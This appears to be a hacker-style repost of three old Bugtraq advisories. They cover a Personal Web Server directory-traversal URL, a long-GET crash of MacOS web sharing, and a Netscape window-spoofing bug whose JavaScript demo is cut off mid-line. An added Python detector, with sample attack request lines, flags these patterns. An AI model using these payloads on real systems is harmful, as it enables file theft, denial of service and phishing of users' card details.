more ripped from bugtraq goodiez, this onez GOOD tho :)
While playing with Microsoft Personal Web Server
(Frontpage-PWS32/3.0.2.926),
I found that the following URL will list the root directory and let you
download any file you want.
http://www.victim.com/....../
Index of /....../
WINDOWS
My Documents
Program Files
FrontPage Webs
AUTOEXEC.BAT
COMMAND.COM
and so on.......
the bugtraq ripper strikes again!*(^!#(* yay!
Sending...
GET aaaaa[...x4000...]aaaaa HTTP/1.0
[followed by pressing return twice]
to port 80 on an Apple Mac, MacOS 8.5.1, with web sharing enabled makes it
change from "Web Sharing On" to "Web Sharing Off", presumably because the web
server task dies. An annoying DoS, possibly worse, who knows (depends if
they compiled with range checking on, what language they used, etc).
-David.
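Added example, not from either post: a Python check over request lines that flags the two patterns described above, a path segment made only of dots (the PWS `/....../` URL) and an oversized request target (the 4000-character GET sent to MacOS web sharing). The 2048-character limit, the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

MAX_TARGET_LEN = 2048  # assumed limit, not a value from the posts
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S*) HTTP/\d\.\d$")
DOT_RUN = re.compile(r"^\.{2,}$")  # segment made only of dots: "..", "...", "......"

def classify(request_line):
    """Return the findings for one HTTP request line (empty list = clean)."""
    m = REQUEST_LINE.match(request_line)
    if not m:
        return ["malformed-request-line"]
    target = m.group(2)
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized-target")
    # Drop the query string, decode %2e-style escapes, unify separators.
    path = unquote(target.split("?", 1)[0]).replace("\\", "/")
    if any(DOT_RUN.match(seg) for seg in path.split("/")):
        findings.append("dot-run-segment")
    return findings

def scan(request_lines):
    """Map the index of each flagged request line to its findings."""
    hits = {}
    for i, line in enumerate(request_lines):
        found = classify(line)
        if found:
            hits[i] = found
    return hits

# Constructed sample request lines (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /....../ HTTP/1.0",
    "GET /%2e%2e%2e/AUTOEXEC.BAT HTTP/1.0",
    "GET /docs/v1...2/readme.txt HTTP/1.0",
    "GET " + "a" * 4000 + " HTTP/1.0",
]

if __name__ == "__main__":
    for index, found in scan(SAMPLE_REQUESTS).items():
        print(index, SAMPLE_REQUESTS[index][:40], found)
```

Dots inside a longer name (`v1...2`) are left alone; only segments that consist entirely of dots are flagged.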
Netscape Communicator window spoofing bug
There is a bug in Netscape Communicator 3.04, 4.06, 4.5 Win95 and 4.08 WinNT, which allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled into believing he is browsing a trusted site, while he is browsing a hostile page and may provide sensitive information, such as a credit card number. The bug may be exploited using an HTML mail message. It needs Javascript enabled.
Workaround: Disable Javascript
Demonstration is available at:
http://www.nat.bg/~joro/b14.html
http://www.whitehats.com/guninski/b14.html
This bug is different from the "frame spoofing vulnerability"
The code is:
-------------------------------
function doit()
{
a.document.open();
a.document.write("<H1>Look at the location bar!<BR>");
a.document.write("<A HREF='http://www.whitehats.com/guninski'>Go to